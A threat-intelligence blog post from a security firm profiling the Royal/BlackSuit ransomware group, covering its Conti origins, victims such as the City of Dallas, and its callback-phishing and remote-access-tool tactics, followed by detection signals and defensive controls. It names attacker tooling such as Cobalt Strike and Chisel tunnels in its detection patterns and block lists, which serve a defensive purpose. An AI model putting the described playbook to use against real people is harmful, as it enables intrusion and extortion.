BIPI
BIPI

Royal/BlackSuit: The Conti Splinter That Took Dallas Offline

Threat Intelligence

Royal ransomware (now BlackSuit) was the Conti splinter that proved municipal governments were chronically under-defended. The Dallas attack and callback phishing playbook are still active under the new brand.

By Arjun Raghavan, Security & Systems Lead, BIPI · August 15, 2024 · 8 min read

#royal#blacksuit#ransomware#conti

Royal ransomware was the second-most prolific Conti spinoff after Black Basta. The crew rebranded to BlackSuit in mid-2023 but kept the operational tradecraft. The May 2023 attack on the City of Dallas remains one of the most disruptive US municipal government cyber incidents on record, and the BlackSuit successor continues to hit cities, hospitals, and school districts.

Actor Profile

Royal first appeared in September 2022 and was assessed by CISA, FBI, and multiple vendors as a private operation (no broad affiliate program) led by former Conti operators. The June 2023 transition to BlackSuit was confirmed by codebase analysis showing ~98% similarity between Royal and BlackSuit encryptors. The crew is Russian-speaking, with leak site infrastructure operated out of bulletproof hosting providers.

Attribution caveat: Royal/BlackSuit is small enough that operator continuity is plausible to track via code reuse, but no public criminal attribution to specific individuals exists.

TTPs

Royal pioneered the modern callback phishing initial access vector, which has since been adopted by Black Basta, Luna Moth, and other crews.

  • Callback phishing: PDF invoices for fake subscription renewals with a phone number for cancellation (MITRE T1566.003)
  • Victim calls the number, talks to a fake call center agent, gets walked through installing AnyDesk or Splashtop
  • Post-access: Cobalt Strike, then Chisel, NetScan, AdFind for network reconnaissance
  • Discord and Reddit-hosted infrastructure for some C2 callbacks (TTP overlap with other Conti splinters)
  • Partial encryption (encrypting only a percentage of each file) for speed on large file servers
  • Double extortion with leak site, then triple extortion (DDoS) added in late 2023

Notable Victims

City of Dallas (May 2023, disrupted police, courts, and 311 services for weeks), Silverstone Circuit, multiple US school districts, several US county governments, Cleveland Municipal Court, and a string of US healthcare networks. Under the BlackSuit brand, victims have included CDK Global (June 2024, disrupting US car dealerships nationwide), Octapharma Plasma, KADOKAWA, and the City of Coppell, Texas.

Royal did not need to phish a user with a malicious attachment. It got them to call.

Detection Signals

Callback phishing is hard to catch with email security alone because the lure attachment is often a clean PDF. Detection has to extend to phone-call workflows and post-call endpoint behavior.

  • PDF invoice attachments from new senders containing a customer-service phone number and no payload
  • AnyDesk, Splashtop, or ScreenConnect installation on a user endpoint within 60 minutes of opening such a PDF
  • Outbound connections to Cobalt Strike beacon profiles or Chisel SOCKS tunnels
  • AdFind, NetScan, or BloodHound-style enumeration from a user workstation
  • Discord CDN or Reddit-hosted file downloads via PowerShell on user endpoints

Defensive Controls

Municipal governments and school districts remain Royal/BlackSuit's preferred targets because the controls below are structurally underfunded in those sectors.

  1. Train staff that legitimate vendors will never ask them to install remote control software over the phone. Make it a documented policy.
  2. Block consumer RMM tools (AnyDesk, Splashtop, TeamViewer, ScreenConnect for non-MSP use) at the EDR level by default.
  3. Filter outbound traffic to Discord CDN and Reddit-hosted attachments from corporate endpoints.
  4. Apply CISA's #StopRansomware guidance for Royal/BlackSuit specifically: phishing-resistant MFA, segmented backups, validated recovery testing.
  5. For municipal and SLED sector defenders, engage with MS-ISAC and the StateRAMP/CISA cyber hygiene programs. The free controls cover most of the gap.

Royal became BlackSuit, but the playbook has not changed. Callback phishing into RMM abuse into Cobalt Strike into double-extortion encryption is now a template used across the post-Conti ecosystem. The defenders best positioned for the next variant are the ones who already treat phone-driven IT support requests as a high-risk channel today.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.